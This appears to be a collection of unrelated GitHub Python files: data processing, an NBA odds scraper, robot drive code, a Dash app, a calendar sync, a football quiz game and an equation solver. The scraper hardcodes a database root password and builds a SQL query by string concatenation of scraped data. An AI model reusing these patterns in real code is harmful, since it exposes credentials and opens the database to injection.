0) #elimino riga delle unità di misura dal file\n\t\t\t\t#aggiorno l'header del file csv aggiungengo le unità di misura\n\t\t\t\tfor i in range(len(df.columns)):\n\t\t\t\t\tmeasure_units[0][i] = measure_units[0][i].replace(\"(\", \"[\")\n\t\t\t\t\tmeasure_units[0][i] = measure_units[0][i].replace(\")\", \"]\")\n\t\t\t\t\tdf.rename(columns={ df.columns[i]: df.columns[i] + measure_units[0][i]}, inplace = True)\n\t\t\t\tpatientID = file[1:7]\n\t\t\t\ttime = file[19:24] + '-00'\n\t\t\t\tdate = file[8:18]\n\t\t\t\t#combine date and time to create a TimeStamp\n\t\t\t\ttimeH = datetime.datetime.strptime(time, '%H-%M-%S').time()\n\t\t\t\tdateH = datetime.datetime.strptime(date, '%Y-%m-%d')\n\t\t\t\ttimestamp = dateH.combine(dateH, timeH)\n\t\t\t\t#Convertion Elapsed Time in H:m:s format\n\t\t\t\tdf[df.columns[0]] = pd.to_numeric(df[df.columns[0]])\n\t\t\t\tdf[df.columns[0]] = df[df.columns[0]].apply(lambda x: datetime.timedelta(seconds = x))\n\t\t\t\t#Elaborate TimeStamp for each sample of the signal\n\t\t\t\tdf[df.columns[0]] = df[df.columns[0]].apply(lambda x: x + timestamp)\n\t\t\t\tdf.rename(columns = {df.columns[0]:'TimeStamp'}, inplace = True)\n\t\t\t\t#insert patientID in Signal file\n\t\t\t\tdf.insert(0, \"SUBJECT_ID\", patientID, True)\n\t\t\t\twith client_hdfs.write('processed/' + file[0:7] + \"/\" + file[:-8] + '.csv', encoding = 'utf-8') as writer:\n\t\t\t\t\tdf.to_csv(writer, sep = ';', index = None, header = True)\n\nprint('Total process time: ', datetime.datetime.now() - current)\n","repo_name":"MancoCarlo/healer-prototype","sub_path":"code/batchProcessing.py","file_name":"batchProcessing.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11309371847","text":"import MySQLdb\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\nimport time\r\nfrom datetime import date, timedelta\r\n\r\n\r\ndef makeURL(bettingkind,bettingdate):\r\n #betting for two kinds of bets\r\n if bettingkind== 'spreads':\r\n bettingtypeinURL=\"\"\r\n elif bettingkind=='totals':\r\n bettingtypeinURL='totals/'\r\n url = 'http://www.sportsbookreview.com/betting-odds/nba-basketball/'+bettingtypeinURL+\"?date=\"+bettingdate\r\n return url\r\n\r\ndef getTeams(soup):\r\n firstlevels = soup.find_all('div', class_='el-div eventLine-team')\r\n\r\n\r\n teams = []\r\n previewURLS=[]\r\n #all this includes the same kind of scraping, with different levels\r\n\r\n\r\n for firstlevel in firstlevels:\r\n #arbritary names\r\n secondlevels= firstlevel.find_all('div',class_='eventLine-value')\r\n for secondlevel in secondlevels:\r\n thirdlevels= secondlevel.find_all('span',class_='team-name')\r\n for thirdlevel in thirdlevels:\r\n for element in thirdlevel:\r\n previewURLS.append(element['href'])\r\n for secondelement in element:\r\n teams.append(secondelement)\r\n return teams\r\n\r\ndef getPoints(soup):\r\n points=[]\r\n firstlevels = soup.find_all('div', class_='scorebox')\r\n for firstlevel in firstlevels:\r\n secondlevels= firstlevel.find_all('div',class_='score-periods')\r\n for secondlevel in secondlevels:\r\n thirdlevels=secondlevel.find_all('span',class_='current-score')\r\n for element in thirdlevels:\r\n element=str(element)\r\n element=element[:-7]\r\n element=element[49:]\r\n points.append(element)\r\n return points\r\n\r\n\r\n\"\"\"def teamswithPoints():\r\n x=getTeams()\r\n y=getPoints()\r\n newlist=[]\r\n for i in range(len(x)):\r\n newlist.append((x[i],y[i]))\r\n return 
newlist\"\"\"\r\n\r\ndef main():\r\n #connection to database\r\n db=MySQLdb.connect(\"localhost\",\"root\",\"vayum12\",\"finalyoubetchadb\")\r\n cursor=db.cursor()\r\n z=db.cursor()\r\n yesterday = date.today() - timedelta(1)\r\n #uses helper function to make the URL of the site we need to scrape\r\n x=makeURL(\"spreads\",str(yesterday.strftime('%Y%m%d')))\r\n r = requests.get(x)\r\n soup = BeautifulSoup(r.text,\"html.parser\")\r\n allgames = soup.find_all('div', class_='event-holder holder-complete')\r\n for game in allgames:\r\n team=getTeams(game)\r\n points=(getPoints(game))\r\n #needs a querry to put into my SQL to map this to the games program\r\n querry='Select id from game where date = \"'+str(yesterday) + '\" and Home_team = \"'+team[1] + '\" and Away_team = \"'+ team[0]+'\"'\r\n cursor.execute(querry)\r\n gameID= cursor.fetchone()\r\n z.execute(\"\"\"INSERT into results(Home_team,Away_team,Home_points,Away_points,game_id) values(%s,%s,%s,%s,%s)\"\"\",(team[1],team[0],points[1],points[0],gameID[0]))\r\n db.commit()\r\n db.close() \r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\n","repo_name":"vayuma/YouBetcha","sub_path":"game results.py","file_name":"game results.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"16911748686","text":"import os\nimport pandas as pd\nimport numpy as np\nimport csv\n\nrootLocation = \"/home/rijesh/Documents/machine-learning/project/data\"\ntargetLocation = \"/home/rijesh/Documents/machine-learning/project/ust-machine-learning-project/merged_data_09_to_18.csv\"\n\ndef getFilesInFolder():\n fileNames = []\n for x in os.listdir(rootLocation):\n fileLoc = os.path.join(rootLocation, x)\n if os.path.isfile(fileLoc):\n fileNames.append(fileLoc)\n fileNames.sort(key=lambda s: int(s[6+ s.find(\"season\"):-4]))\n return fileNames\n\n\ndef iterate():\n fileNames = getFilesInFolder()\n for curfile in fileNames:\n print(\"Starting file cat: \", curfile)\n f = pd.read_csv(curfile)\n for index ,row in f.iterrows():\n if index % 1000 == 0:\n print(\"completed 1000 rows\")\n writeToCsv(row)\n\n\ndef writeToCsv(row):\n with open(targetLocation, \"a+\") as f:\n writer = csv.writer(f, delimiter=',')\n writer.writerow(row)\n\n\niterate()\n\n\n","repo_name":"lbutlr093/ust-machine-learning-project","sub_path":"filemerge.py","file_name":"filemerge.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"11555826872","text":"from ctre import FeedbackDevice, ControlMode, NeutralMode\nimport ctre\nfrom robotpy_ext.common_drivers.navx.ahrs import AHRS\nimport wpilib\nfrom wpilib.command.subsystem import Subsystem\nfrom wpilib.robotbase import RobotBase\nfrom wpilib.smartdashboard import SmartDashboard\n\nfrom common import robotMap\n\n\nclass DriveBase(Subsystem):\n \n def __init__(self):\n super().__init__()\n # Initialize and calibrate the NavX-MXP.\n self.gyro = AHRS.create_spi(wpilib.SPI.Port.kMXP)\n self.gyro.reset()\n \n # Initialize motors.\n self.l1 = ctre.wpi_talonsrx.WPI_TalonSRX(robotMap.left1)\n self.l2 = ctre.wpi_talonsrx.WPI_TalonSRX(robotMap.left2)\n self.r1 = ctre.wpi_talonsrx.WPI_TalonSRX(robotMap.right1)\n self.r2 = ctre.wpi_talonsrx.WPI_TalonSRX(robotMap.right2)\n \n # Select a sensor for PID.\n self.l1.configSelectedFeedbackSensor(FeedbackDevice.CTRE_MagEncoder_Relative, 0, robotMap.ctreTimeout)\n 
self.r1.configSelectedFeedbackSensor(FeedbackDevice.CTRE_MagEncoder_Relative, 0, robotMap.ctreTimeout) \n \n # Left sensor runs in reverse so the phase must be set for PID.\n self.l1.setSensorPhase(True)\n self.r1.setSensorPhase(True)\n \n # Invert motor output as necessary.\n self.r1.setInverted(True)\n self.r2.setInverted(True)\n \n # Set secondary motors to follow primary motor speed.\n self.l2.follow(self.l1)\n self.r2.follow(self.r1)\n \n # Set talons to brake automatically.\n self.l1.setNeutralMode(NeutralMode.Brake)\n self.l2.setNeutralMode(NeutralMode.Brake)\n self.r1.setNeutralMode(NeutralMode.Brake)\n self.r2.setNeutralMode(NeutralMode.Brake)\n \n # If code is running on a RoboRio, configure current limiting.\n if RobotBase.isReal():\n self.l1.configPeakCurrentLimit(robotMap.peakCurrent, robotMap.ctreTimeout)\n self.l1.configPeakCurrentDuration(robotMap.peakTime, robotMap.ctreTimeout)\n self.l1.configContinuousCurrentLimit(robotMap.continuousCurrent, robotMap.ctreTimeout)\n self.l1.enableCurrentLimit(True)\n \n self.l2.configPeakCurrentLimit(robotMap.peakCurrent, robotMap.ctreTimeout)\n self.l2.configPeakCurrentDuration(robotMap.peakTime, robotMap.ctreTimeout)\n self.l2.configContinuousCurrentLimit(robotMap.continuousCurrent, robotMap.ctreTimeout)\n self.l2.enableCurrentLimit(True)\n \n self.r1.configPeakCurrentLimit(robotMap.peakCurrent, robotMap.ctreTimeout)\n self.r1.configPeakCurrentDuration(robotMap.peakTime, robotMap.ctreTimeout)\n self.r1.configContinuousCurrentLimit(robotMap.continuousCurrent, robotMap.ctreTimeout)\n self.r1.enableCurrentLimit(True)\n \n self.r2.configPeakCurrentLimit(robotMap.peakCurrent, robotMap.ctreTimeout)\n self.r2.configPeakCurrentDuration(robotMap.peakTime, robotMap.ctreTimeout)\n self.r2.configContinuousCurrentLimit(robotMap.continuousCurrent, robotMap.ctreTimeout)\n self.r2.enableCurrentLimit(True)\n \n # Reset max recorded velocities\n self.maxRecordedLeftVelocity = 0\n self.maxRecordedRightVelocity = 0\n \n self.r1.configNeutralDeadband(0.1, 10)\n self.r2.configNeutralDeadband(0.1, 10)\n self.l1.configNeutralDeadband(0.1, 10)\n self.l2.configNeutralDeadband(0.1, 10)\n \n def diagnosticsToSmartDash(self):\n # Add position, velocity, and angle values to the SmartDash.\n \n SmartDashboard.putNumber(\"Left Encoder\", self.getLeftPosition() / robotMap.countsPerRevolution)\n SmartDashboard.putNumber(\"Right Encoder\", self.getRightPosition() / robotMap.countsPerRevolution)\n# SmartDashboard.putNumber(\"Left Velocity\", self.getLeftVelocity())\n# SmartDashboard.putNumber(\"Right Velocity\", self.getRightVelocity())\n \n if RobotBase.isReal():\n SmartDashboard.putNumber(\"Left Speed\", self.l1.getMotorOutputPercent())\n SmartDashboard.putNumber(\"Right Speed\", self.r1.getMotorOutputPercent())\n \n SmartDashboard.putNumber(\"Gyro Angle\", self.gyro.getAngle())\n SmartDashboard.putNumber(\"Barometric Pressure\", self.gyro.getBarometricPressure())\n\n def drive(self, leftSpeed, rightSpeed):\n # Set drive speed.\n self.l1.set(leftSpeed)\n self.r1.set(rightSpeed)\n \n def disable(self):\n self.l1.disable()\n self.r1.disable()\n \n def getGyroAngle(self):\n return self.gyro.getAngle()\n \n def resetGyroAngle(self):\n self.gyro.reset()\n \n def getLeftPosition(self):\n return -self.l1.getSensorCollection().getQuadraturePosition() \n \n def getRightPosition(self):\n return self.r1.getSensorCollection().getQuadraturePosition()\n \n def resetEncoderPosition(self):\n self.l1.getSensorCollection().setQuadraturePosition(0, robotMap.ctreTimeout)\n 
self.r1.getSensorCollection().setQuadraturePosition(0, robotMap.ctreTimeout)\n \n def getRightVelocity(self):\n return self.r1.getSensorCollection().getQuadratureVelocity()\n \n def getLeftVelocity(self):\n return -self.l1.getSensorCollection().getQuadratureVelocity()\n\n def positionPID(self, position):\n self.l1.set(ControlMode.Position, position)\n self.r1.set(ControlMode.Position, position)\n \n def getLeftError(self):\n return self.l1.getClosedLoopError(0)\n \n def getRightError(self):\n return self.r1.getClosedLoopError(0)\n\n\ndriveBase = DriveBase()\n","repo_name":"RVRProgramming/Diablo2018","sub_path":"subsystems/driveBase.py","file_name":"driveBase.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"30916249084","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport dash_table\nfrom dash.dependencies import Input, Output, State\n\n# loading external resources\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\noptions = dict(\n # external_stylesheets=external_stylesheets\n)\n\ndemo_app = dash.Dash(__name__, **options)\n\ndf_table = pd.read_csv(\"data/children-per-woman-UN.csv\")\ndf_table = df_table.dropna()\n\n\ndemo_app.layout = html.Div(\n children=[\n html.H1(children=\"Hello Dash\", id=\"title\"),\n html.Div(children=\"\"\"Hello World !\"\"\", id=\"paragraph\"),\n # dash_table.DataTable(\n # id='table',\n # columns=[{\"name\": i, \"id\": i} for i in df_table.columns],\n # data=df_table.to_dict('records'),\n # style_table={\n # 'maxHeight': '300px',\n # 'overflowY': 'scroll'\n # },\n # #filter_action=\"native\",\n # # sort_action=\"native\",\n # # fixed_rows={'headers': True, 'data': 0}\n # ),\n dcc.Dropdown(\n id=\"country-select\",\n multi=True,\n options=[\n {\"label\": country, \"value\": country_iso if country_iso else \"none\"}\n for country, country_iso in zip(\n df_table.country.unique(), df_table.country_iso.unique()\n )\n ],\n ),\n dcc.Graph(\n id=\"example-graph\",\n figure={\n \"data\": [\n {\"x\": [1, 2, 3], \"y\": [4, 1, 2], \"type\": \"bar\", \"name\": \"SF\"},\n {\n \"x\": [1, 2, 3],\n \"y\": [2, 4, 5],\n \"type\": \"bar\",\n \"name\": u\"Montréal\",\n },\n ],\n \"layout\": {\"title\": \"Dash Data Visualization\"},\n },\n ),\n ]\n)\n\n\n@demo_app.callback(\n [\n Output(component_id=\"paragraph\", component_property=\"children\"),\n Output(component_id=\"example-graph\", component_property=\"figure\"),\n ],\n [Input(component_id=\"country-select\", component_property=\"value\")],\n [State(component_id=\"example-graph\", component_property=\"figure\")],\n)\ndef update_figure(banana, cur_figure):\n\n if banana is not None:\n fig = {\n \"data\": [\n {\n \"x\": df_table[df_table.country_iso == iso].year,\n \"y\": df_table[df_table.country_iso == iso].fertility,\n \"type\": \"line\",\n \"name\": iso,\n }\n for iso in banana\n ],\n \"layout\": {\"title\": \"Dash Data Visualization\"},\n }\n else:\n banana = \"init\"\n fig = cur_figure\n\n return banana, fig\n\n\nif __name__ == \"__main__\":\n demo_app.run_server(debug=True)\n","repo_name":"rl-institut/workshop","sub_path":"plotly-dash/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"45"} +{"seq_id":"35603560695","text":"from __future__ import print_function\nimport datetime\nimport 
pickle\nimport os.path\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nimport requests\nimport pandas as pd\nimport csv\nfrom gcsa.google_calendar import GoogleCalendar\nfrom gcsa.event import Event\nfrom datetime import date, datetime\n\n\nSCOPES = ['https://www.googleapis.com/auth/calendar']\n\n\n\ndef main():\n\n \n \n #### GOOGLE CALENDAR AUTHENTIFICATION STUFF\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n print('Connecting with saved credentials')\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n print('Expired credentials, asking user to log in again')\n creds.refresh(Request())\n else:\n print('No credentials found, asking user to log in')\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n CAL = build('calendar', 'v3', credentials=creds)\n\n #Downloading the schedule from TimeEdit\n url = os.getenv('TIMEEDIT_URL')\n \n #Get the csv version of the schedule\n if url.find('.'):\n url = \"\".join([url.rsplit('.', 1)[0], '.csv'])\n #print(url)\n \n open('schedule.csv', 'wb').write(requests.get(url, allow_redirects=True).content)\n\n rows = []\n with open('schedule.csv') as f:\n reader = csv.reader(f, quotechar='\"')\n for row in reader:\n rows.append(row)\n #print(rows[5])\n\n calendar = GoogleCalendar(os.getenv('TIMEEDIT_MAIL'))\n \n x = 4\n while(len(rows) > x):\n dates = rows[x][0].split(\"-\")\n start_clock = rows[x][1].split(\" \")\n start_clock = start_clock[1].split(\":\")\n end_clock = rows[x][3].split(\" \")\n end_clock = end_clock[1].split(\":\")\n start = datetime(year=int(dates[0]), month=int(dates[1]), day=int(dates[2]), hour=int(start_clock[0]), minute=int(start_clock[1]))\n end = datetime(year=int(dates[0]), month=int(dates[1]), day=int(dates[2]), hour=int(end_clock[0]), minute=int(end_clock[1]))\n event = Event('{0} {1}'.format(rows[x][5], rows[x][4]),\n start=start,\n end=end)\n\n calendar.add_event(event)\n\n print('Attempting to add calendar event')\n x += 1\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"PerssonAlbin/cal-inject_OWN_PY","sub_path":"timeedit.py","file_name":"timeedit.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7253430050","text":"class Football:\n\n def __init__(self):\n self.teams = list([\"chelsea fc\", \"barcelona fc\", \"real madrid fc\", \"bayern munich fc\",\n \"paris saint germain fc\", \"ajax fc\", \"sevilla fc\", \"as monaco fc\"])\n self.winners = []\n self.final_team = []\n\n def team_list(self):\n print(f\"Welcome to Champions League here is the list of teams: \")\n print(f\"{self.teams}\".title())\n play_game = input(\"Please type 'start' to play the game or 'exit': \")\n if play_game == \"start\":\n team = [\"chelsea fc\", \"barcelona fc\", \"real madrid fc\", \"bayern munich fc\",\n \"paris saint germain fc\", \"ajax fc\", \"sevilla fc\", \"as monaco fc\"]\n print(\"Results 
of last 8 are as follows: \")\n print(\"\\n\")\n print(f\"{team[0]} vs {team[7]}\".title())\n print(f\"{team[1]} vs {team[6]}\".title())\n print(f\"{team[2]} vs {team[5]}\".title())\n print(f\"{team[3]} vs {team[4]}\".title())\n print(\"\\n\")\n score_team1 = int(input(f\"Please enter the score of {team[0]}: \"))\n score_team2 = int(input(f\"Enter the score of {team[7]}: \"))\n if score_team1 > score_team2:\n print(f\"{team[0]}..You are through to champions league, semi final stage..\".title())\n self.winners.append(team[0].title())\n else:\n print(f\"{team[7]}, You are through to champions league semi finals..\".title())\n self.winners.append(team[7].title())\n score_team3 = int(input(f\"Enter a score of {team[1]}: \"))\n score_team4 = int(input(f\"Enter a score of {team[6]}: \"))\n if score_team3 > score_team4:\n print(f\"{team[1]}, you are through to the semi finals..\".title())\n self.winners.append(team[1].title())\n else:\n print(f\"{team[6]}, you are through to the semi finals..\".title())\n self.winners.append(team[6].title())\n score_team5 = int(input(f\"Enter a score of {team[2]}: \"))\n score_team6 = int(input(f\"Enter a score of {team[5]}: \"))\n if score_team5 > score_team6:\n print(f\"{team[2]}, you are through to the semi finals..\".title())\n self.winners.append(team[2].title())\n else:\n print(f\"{team[5]}, you are through to the semi finals..\")\n self.winners.append(team[5].title())\n score_team7 = int(input(f\"Enter a score of {team[3]}: \"))\n score_team8 = int(input(f\"Enter a score of {team[4]}: \"))\n if score_team7 > score_team8:\n print(f\"{team[3]}, you are through to the semi finals..\")\n self.winners.append(team[3].title())\n else:\n print(f\"{team[4]}, you are through to the semi finals..\")\n self.winners.append(team[4].title())\n\n print(f\"Following teams has gone through the next stage: \")\n print(self.winners)\n\n if play_game == \"exit\":\n print(\"Goodbye\")\n\n def semi_final(self):\n print(\"\\n\")\n print(f\"Welcome to the stage of Semi finals...\")\n print(f\"Team's of the semi finals are: \")\n semi_draw = self.winners\n print(f\"{semi_draw}\".upper())\n print(\"Draw of the semi finals are as follows: \")\n semi_1 = (f\"{self.winners[0]} vs {self.winners[1]}\")\n semi_2 = (f\"{self.winners[2]} vs {self.winners[3]}\")\n print(semi_1)\n print(semi_2)\n semi_score = int(input(f\"Please enter the score of {self.winners[0]}: \"))\n semi_score_1 = int(input(f\"Please enter the score of {self.winners[1]}: \"))\n if semi_score > semi_score_1:\n print(f\"{self.winners[0]}, Congratulation you are in the final\")\n self.final_team.append(self.winners[0])\n else:\n print(f\"{self.winners[1]}, Congratulations you are going through to the final\")\n self.final_team.append(self.winners[1])\n semi_final_team_2 = int(input(f\"Enter the score of {self.winners[2]}: \"))\n semi_final_team_2_1 = int(input(f\"Enter the score of {self.winners[3]}: \"))\n if semi_final_team_2 > semi_final_team_2_1:\n print(f\"{self.winners[2]}, congrats you are in the final\")\n self.final_team.append(self.winners[2])\n else:\n print(f\"{self.winners[3]}, congrats you are in the final\")\n self.final_team.append(self.winners[3])\n print(\"Teams for the final of champions league is: \")\n for team in self.final_team:\n print(team)\n\n\n def final(self):\n print(\"\\n\")\n print(\"Welcome to Munich, for the final's of Champions League 2020\")\n final_team_1 = int(input(f\"Enter the score of {self.final_team[0]}: \"))\n final_team_2 = int(input(f\"Enter the score of {self.final_team[1]}: 
\"))\n if final_team_1 > final_team_2:\n print(f\"Massive Congratualtions to {self.final_team[0]} for winning it..\")\n else:\n print(f\"Huge Congratulations to {self.final_team[1]} for winning it first time..\")\n\nchampions_league = Football()\nchampions_league.team_list()\nchampions_league.semi_final()\nchampions_league.final()","repo_name":"fabchirag/champions_league","sub_path":"champions_league.py","file_name":"champions_league.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35842548445","text":"import igraph as ig\nimport numpy as np\nfrom random import random\n\n\nclass BaseItem:\n def __init__(self):\n self.vars = []\n self.equations = {}\n self.matched = {}\n self.silent = False\n\n def finish_init(self, **kwargs):\n if \"silent\" in kwargs:\n self.silent = kwargs.pop(\"silent\")\n self.matched = {k: kwargs[k] for k in self.vars if k in kwargs}\n\n \"\"\"self.solve_graph.add_vertices(len(self.vars))\n self.solve_graph.vs[\"names\"] = self.vars\n for identity, equation in self.equations.items():\n target_index = self.vars.index(identity[0])\n print(identity)\n for item in list(identity[1]):\n if item == identity[0]:\n continue\n self.solve_graph.add_edge(target_index, self.vars.index(item))\n self.solve_graph.es[-1][\"identity\"] = identity\n\n print(self.solve_graph.get_all_simple_paths(3, 1))\n print(self.solve_graph.vs[\"names\"])\"\"\"\n\n if not self.silent:\n print(\"-\"*20)\n print(f\"Created {self}\")\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({', '.join([f'{q}: {v}' for q, v in self.matched.items()])})\"\n\n def solve(self, target):\n knowns = set([k for k in self.matched])\n\n equations = {identity: (frozenset([i for i in identity if i not in knowns]), equation) for identity, equation in self.equations.items()}\n\n solve_list = []\n while target not in knowns: # This section does not pass test 2. 
Keys need to be the full io of the function\n print(knowns)\n viewed_pairs = {}\n clear_list = []\n\n for header, group in equations.items():\n unknowns, equation = group\n eq_knowns = frozenset([f for f in header if f in knowns])\n if eq_knowns.issubset(knowns) and eq_knowns:\n solve_list.append((eq_knowns, unknowns, equation))\n clear_list.append(header)\n\n for item in clear_list:\n knowns = knowns.union(equations[item][0])\n equations.pop(item)\n\n for item in equations:\n equations[item] = (frozenset([i for i in item if i not in knowns]), equations[item][1])\n\n solve_nodes = set()\n solve_edges = {}\n\n for start, end, item in solve_list:\n solve_nodes.add(start)\n solve_nodes.add(end)\n if end not in solve_edges:\n solve_edges[end] = [(start, item)]\n else:\n solve_edges[end].append((start, item))\n\n solve_nodes = list(solve_nodes)\n #print(solve_nodes, solve_edges)\n\n # Find a valid start and end candidate\n start_candidates = []\n end_candidates = []\n knowns = [k for k in self.matched]\n for end, starts in solve_edges.items():\n for start, _ in starts:\n if start.issubset(knowns):\n start_candidates += (start, end)\n if target in end:\n end_candidates.append(end)\n\n assert start_candidates\n assert end_candidates\n\n graph = ig.Graph()\n graph.add_vertices(len(solve_nodes))\n for end, starts in solve_edges.items():\n for start, _ in starts:\n graph.add_edge(solve_nodes.index(start), solve_nodes.index(end))\n\n # Use the edge dict and find a path\n path = graph.get_shortest_paths(v=solve_nodes.index(start_candidates[0]),\n to=solve_nodes.index(end_candidates[0]))\n path = path[0]\n\n # Hand off each step to the solver\n cached_results = self.matched.copy()\n current_node = path[0]\n for step in path[1:]: # be careful, this is not really tested\n eq = [v[1] for v in solve_edges[solve_nodes[step]]] # Get equation from step , if v[0] == solve_nodes[current_node]\n print(eq[0])\n if type(eq[0]) == tuple:\n cached_results[list(solve_nodes[step])[0]] = self.object_iterative_solve([eq[0][0], eq[0][2]], eq[0][1], cached_results)\n else:\n cached_results.update(self.iterative_solve(eq, solve_nodes[step], cached_results))\n current_node = step\n return cached_results[target]\n\n\n\n\n\n\n \"\"\" for identity, group in equations.items():\n unknowns, equation = group\n print(identity, unknowns)\n if unknowns not in viewed_pairs:\n viewed_pairs[unknowns] = []\n viewed_pairs[unknowns].append((identity, equation))\n if len(unknowns) == len(viewed_pairs[unknowns]):\n clear_list += viewed_pairs[unknowns]\n solve_bindings[unknowns] = viewed_pairs[unknowns]\n [equations.pop(c[0]) for c in clear_list]\n for v in solve_bindings:\n knowns = knowns.union(v)\n equations = {identity: (frozenset([i for i in identity if i not in knowns]), equation[1]) for identity, equation in equations.items()}\n\"\"\"\n \"\"\"for header, group in solve_bindings.items():\n solve_bindings[header] = [frozenset([v for i in [list(g[0]) for g in group] for v in i]), group]\n\n print(solve_bindings)\n\n unique_values = list(set([a for b in [[header, frozenset([g for g in group[0] if g not in header])] for header, group in solve_bindings.items()] for a in b])) # Demon comprehension -> collects a list of all unique groups of variables\n print(unique_values)\n\n graph = ig.Graph()\n graph.add_vertices(len(unique_values))\n for header, group in solve_bindings.items():\n graph.add_edge(unique_values.index(header), unique_values.index(frozenset([g for g in group[0] if g not in header])))\n\n start_node_candidates = [node for node 
in unique_values if node.issubset(set(self.matched.keys()))]\n\n target_node_candidates = [node for node in unique_values if target in node]\n assert target_node_candidates\n assert start_node_candidates\n\n start_node = start_node_candidates[0]\n target_node = target_node_candidates[0]\n path = graph.get_shortest_paths(v=unique_values.index(start_node), to=unique_values.index(target_node))\n assert path\n path = [unique_values[p] for p in path[0]]\n print(path)\n\n current = path.pop(0)\n result = []\n while path:\n item = path.pop(0)\n print(current, item)\n current = item\"\"\"\n\n\n def object_iterative_solve(self, equation, intermediates, knowns=None):\n if not equation:\n print(\"Equations not provided\")\n return knowns\n knowns = self.matched if knowns is None else knowns\n\n output = {t: random() for t in intermediates}\n\n temps = knowns.copy()\n for q in range(100): # Multidimensional newtons method\n temps.update(output)\n base_obj = equation[0](temps)\n fx = [e(base_obj, temps) for e in equation[1]]\n fx = np.matrix(fx).T\n\n dx = [[(e(equation[0]({**temps, **{t: temps[t] + 0.001}}), {**temps, **{t: temps[t] + 0.001}}) -\n e(equation[0]({**temps, **{t: temps[t] - 0.001}}), {**temps, **{t: temps[t] - 0.001}}))/0.002\n for t in intermediates] for e in equation[1]]\n dx = np.matrix(dx)\n\n # a non invertible matrix could be improper equation selection or the derivative == 0 prematurely\n output_vec = np.matrix(list(output.values())) - np.dot(np.linalg.inv(dx), fx).T\n output = {t: output_vec.item(0, i) for i, t in enumerate(intermediates)}\n\n if not q % 50 and not self.silent:\n print(f\"Iter {q}: x={output}, \\nf={fx}, \\nd={dx}\\n\")\n if not self.silent:\n print(f\"Iter {q + 1}: x={output}, \\nf={fx}, \\nd={dx}\\n\")\n print(\"-\"*20)\n temps.update(output)\n return equation[0](temps)\n\n def iterative_solve(self, equation, target_name, knowns=None):\n if not equation:\n print(\"Equations not provided\")\n return knowns\n knowns = self.matched if knowns is None else knowns\n if target_name in set(knowns):\n return {v: knowns[v] for v in target_name}\n\n output = {t: random() for t in target_name}\n\n temps = knowns.copy()\n for q in range(100): # Multidimensional newtons method\n temps.update(output)\n fx = [e(temps) for e in equation]\n fx = np.matrix(fx).T\n\n dx = [[(e({**temps, **{t: temps[t] + 0.001}}) - e({**temps, **{t: temps[t] - 0.001}}))/0.002 for t in target_name] for e in equation]\n dx = np.matrix(dx)\n\n # a non invertible matrix could be improper equation selection or the derivative == 0 prematurely\n output_vec = np.matrix(list(output.values())) - np.dot(np.linalg.inv(dx), fx).T\n output = {t: output_vec.item(0, i) for i, t in enumerate(target_name)}\n\n if not q % 50 and not self.silent:\n print(f\"Iter {q + 1}: x={output}, \\nf={fx}, \\nd={dx}\\n\")\n if not self.silent:\n print(f\"Iter {q + 1}: x={output}, \\nf={fx}, \\nd={dx}\\n\")\n print(\"-\"*20)\n return {t: round(v, 6) for t, v in output.items()}\n\n def __getattr__(self, item):\n if item not in self.vars:\n raise AttributeError(f\"{self.__class__.__name__} does not recognise {item}\")\n if item in self.matched:\n return self.matched[item]\n return self.solve(item)\n\n def get_base_template(self):\n return(\"\"\"super().__init__()\n self.vars = [\"x\", \"y\", \"mag\", \"angle\"]\n self.equations = {frozenset([\"x\", \"y\", \"mag\"]): (lambda i: (i[\"x\"] ** 2 + i[\"y\"] ** 2) ** 0.5 - i[\"mag\"]),\n frozenset([\"x\", \"angle\", \"mag\"]): (lambda i: (i[\"x\"] / math.cos(math.radians(i[\"angle\"]))) - 
